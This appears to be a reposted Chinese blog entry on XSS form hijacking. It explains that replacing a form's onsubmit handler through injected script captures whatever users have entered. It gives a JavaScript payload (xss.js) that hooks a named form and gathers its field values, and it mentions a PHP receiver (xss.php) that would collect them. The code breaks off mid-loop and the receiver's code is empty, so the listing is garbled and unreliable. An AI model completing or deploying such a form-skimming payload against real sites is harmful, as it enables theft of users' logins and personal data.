千家信息网

xss 表单劫持(from通用明文记录)

发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.xss.js
千家信息网最后更新 2025年01月20日xss 表单劫持(from通用明文记录)

大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.


xss.js:

var f=document.forms['from1'];if(f==undefined){        f=document.getElementById('');}var func=f.onsubmit;f.onsubmit=function(event){        var str='';        for(var i=0;i



接收端xss.php



参考:

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/

0